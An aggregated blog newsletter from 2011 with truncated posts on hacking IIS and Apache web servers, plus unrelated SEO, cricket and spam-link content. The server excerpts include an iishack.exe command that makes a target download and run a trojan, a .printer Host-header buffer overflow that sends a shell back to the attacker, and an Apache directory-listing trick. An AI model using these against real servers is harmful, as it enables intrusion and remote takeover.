Wednesday, March 30, 2011

Free Hacking News Letter

Free Hacking News Letter

Link to Learn Ethical Hacking Download Free Hacking Tools Learn Hacking and Join Indian Cyber Army

How to ROOT a Server? Tools & software useful to hack web servers: Learn server hacking

Posted: 30 Mar 2011 01:49 PM PDT

Hacking Tool: IISHack.exe iishack.exe overflows a buffer used by IIS http daemon, allowing for arbitrary code to be executed. c:\ iishack www.yourtarget.com 80 www.yourserver.com/thetrojan.exe www.yourtarget.com is the IIS server you're hacking, 80 is the port its listening on, www.yourserver.com is some webserver with your trojan or custom script (your own, or another), and /thetrojan.exe is the path to that script."IIS Hack" is a buffer overflow vulnerability exposed by the way IIS...

Do you want to read more..Visit my site @ http://www.amarjit.info

What are IIS Components? Learn IIS server hacking

Posted: 30 Mar 2011 01:49 PM PDT

IIS Components IIS relies heavily on a collection of DLLs that work together with the main server process, inetinfo.exe, to provide various capabilities. Example: Server side scripting, Content Indexing, Web Based printing etc. This architecture provides attackers with different functionality to exploit via malicious input. IIS relies heavily on a collection of DLLs that work together with the main server process, inetinfo.exe, to provide various capabilities. Example: Server side...

Do you want to read more..Visit my site @ http://www.amarjit.info

Canonicalization : Vulnerability : Exploit : Unicode

Posted: 30 Mar 2011 01:49 PM PDT

Canonicalization Canonicalization is the process by which various equivalent forms of a name can be resolved to a single, standard name - the so-called canonical name. For example, on a given machine, the names c:\dir\test.dat, test.dat, and ..\..\test.dat might all refer to the same file. Canonicalization is the process by which such names would be mapped to a name like c: \dir\test.dat. Vulnerability When certain types of files are requested via a specially-malformed URL, the...

Do you want to read more..Visit my site @ http://www.amarjit.info

Attacks against IIS: How to Hack IIS servers

Posted: 30 Mar 2011 01:49 PM PDT

Attacks against IISIIS is one of the most widely used Web server platforms on the Internet.Microsoft's Web Server has been the frequent target over the years.It has been attacked by various vulnerabilities. Examples include:::$DATA vulnerabilityshowcode.asp vulnerabilityPiggy backing vulnerabilityPrivilege command executionBuffer Overflow exploits (IIShack.exe) Let us look at some of the technology that forms the basis of web applications.Simple HTML could not contribute much to the dynamic...

Do you want to read more..Visit my site @ http://www.amarjit.info

What is Vulnerability? How to execute Exploits on a known vulnerablity

Posted: 30 Mar 2011 01:49 PM PDT

The vulnerability arises when a buffer of approx. 420 bytes is sent within the HTTP Host: header for a .printer ISAPI request. Remotely exploits buffer overflow, inserts shellcode to "shovel a shell" back to a listener on attacker's system.Example:GET /NULL.printer HTTP/1.0Host: [buffer] (Where [buffer] is approx. 420 characters.)When exploited, an attacker would have caused a buffer overflow within IIS and have overwritten EIP. Now normally the web server would stop responding once the...

Do you want to read more..Visit my site @ http://www.amarjit.info

What is ISAPI Extension? ISAPI working & ISAPI DLL Buffer Overflows

Posted: 30 Mar 2011 01:48 PM PDT

ISAPI Extension An ISAPI extension is a dynamic link library (.dll) that uses ISAPI to provide a set of web functions above and beyond those natively provided by IIS. ISAPI is developed to provide advantage over the shortcomings of Common Gateway Interface, CGI. An ISAPI extension is a regular DLL file that exposes three special functions that are called by the calling process (i.e., IIS) and therefore, will be loaded to memory only once, irrespective of how many clients are going to use...

Do you want to read more..Visit my site @ http://www.amarjit.info

Apache Vulnerability: Hack Apache based Web Servers

Posted: 30 Mar 2011 01:48 PM PDT

Apache Vulnerability The Apache Week tracks the vulnerabilities in Apache Server. Even Apache has its share of bugs and fixes. For instance, consider the vulnerability which was found in the Win32 port of Apache 1.3.20. Long URLs passing through the mod_negative, mod_dir and mode_autoindex modules could cause Apache to list directory contents. The concept is simple but requires a few trial runs. A URL with a large number of trailing slashes: /cgi-bin /////////////////////////// /...

Do you want to read more..Visit my site @ http://www.amarjit.info

Popular Web Servers : Hacking Web Servers

Posted: 30 Mar 2011 01:48 PM PDT

The popular web servers are Apache Web Server, Internet Information Server and Sun ONE Web Server. The Apache Web Server is an open-source web server for modern operating systems including UNIX and Windows NT. The server provides HTTP services in sync with the current HTTP standards in an efficient and extensible environment. The Java Web Server / Sun ONE Web Server is one of the other highly available Web servers on the market. Microsoft's Internet Information Server is another popular...

Do you want to read more..Visit my site @ http://www.amarjit.info

How Web Servers Work : How to Hack Web Servers

Posted: 30 Mar 2011 01:48 PM PDT

The browser breaks the URL into three parts: The protocol ("http") The server name ("www.website.com") The file name ("webpage.html") The browser communicates with a name server, which translates the server name, www.website.com, into an IP address The browser then forms a connection to the Web server at that IP address on port 80. Following the HTTP protocol, the browser sends a GET request to the server, asking for the file http://webpage.html. The server sends the HTML text for...

Do you want to read more..Visit my site @ http://www.amarjit.info

How to ROOT a Server? Learn Hacking Web Servers: How to hack web servers?

Posted: 30 Mar 2011 01:48 PM PDT

The Internet is probably where security or the lack of it is seen the most. Often, a breach in security causes more damage in terms of goodwill than the actual quantifiable loss. This makes the security of web servers assume critical importance. Most organizations consider their Internet presence as an extension of themselves. In this module, we will explore: The basic function of a web server Popular web servers and common vulnerabilities Apache Web Server and known vulnerabilities ...

Do you want to read more..Visit my site @ http://www.amarjit.info

Want More Blog Traffic! Submit Your New Blog Here For Free

Posted: 30 Mar 2011 01:33 PM PDT

When your blog is new the only thing you want is traffic and the most easy, simple, best and successful methods are here mentioned below:Leave a comment at the bottom of this post with your blog's URL and describe your blog in a short paragraph.Subscribe to my RSS feed (In return, I will help you to boost your traffic).Subscribe to the other blogs' RSS feeds.Make sure you subscribe to the comments so that you get alerted on every new comment.Do not post as Anonymous user, it will be considered...

Do you want to read more..Visit my site @ http://www.amarjit.info

How to Analysis your website for search engine optimization

Posted: 30 Mar 2011 01:46 PM PDT

If Web page has a "0" Google™ PageRank™. PageRank™ denotes a Website's importance in the eyes of Google™.Fact: If you are not on the first page of search results, over 60% of Internet users will not find you!If Title Tag contains too many characters for what we consider a "robot friendly" Web page. The maximum number of characters we recommend for this Tag is 60.Fact: Alll major search engines including Google, Yahoo!, Scrub The Web, MSN Bing and others utilize Meta Tags! Don't take our word...

Do you want to read more..Visit my site @ http://www.amarjit.info

Dhoni vs Afridi: De Ghumaaaake!! India vs Pakistan World-cup Semifinal

Posted: 29 Mar 2011 11:25 PM PDT

Dhoni vs Afridi: De Ghumaaaake!! India vs Pakistan World-cup Semifinal Till now, was just the trailer, Here is the full version... Sachin: Haan Airport k liye taxi wahase milegi In Airport… airhostess asking Ponting, Smith, Sammy & Strauss why are u waiting here...? We are all waiting for AFRIDI.... ... Coming Soon Cheers for India !!!!!!!!!!!!!!!! ---Do you want to share you views?? Just leave a comment here. you can also drop an email on mail@amarjit.info---Regards, Amarjit Singh

Do you want to read more..Visit my site @ http://www.amarjit.info

W3Perl: A Tool to Analyse Your Web Activity | Chintan Gurjar

Posted: 29 Mar 2011 10:59 PM PDT

W3Perl is a logfile analyser based on logfiles parsing and distributed under the GPL licence. It require a configuration file which can be build from a web interface. A complete list of features is available in this section, with a short description of all scripts. The glossary is here to help you understanding your report. Main features - HTML output Easy to backup or move - Fast Work in incremental mode - WWW/FTP/Mail/Squid server Not restricted to web server - Email report...

Do you want to read more..Visit my site @ http://www.amarjit.info
 
Vida de bombeiro Recipes Informatica Humor Jokes Mensagens Curiosity Saude Video Games Car Blog Animals Diario das Mensagens Eletronica Rei Jesus News Noticias da TV Artesanato Esportes Noticias Atuais Games Pets Career Religion Recreation Business Education Autos Academics Style Television Programming Motosport Humor News The Games Home Downs World News Internet Car Design Entertaimment Celebrities 1001 Games Doctor Pets Net Downs World Enter Jesus Variedade Mensagensr Android Rub Letras Dialogue cosmetics Genexus Car net Só Humor Curiosity Gifs Medical Female American Health Madeira Designer PPS Divertidas Estate Travel Estate Writing Computer Matilde Ocultos Matilde futebolcomnoticias girassol lettheworldturn topdigitalnet Bem amado enjohnny produceideas foodasticos cronicasdoimaginario downloadsdegraca compactandoletras newcuriosidades blogdoarmario arrozinhoii sonasol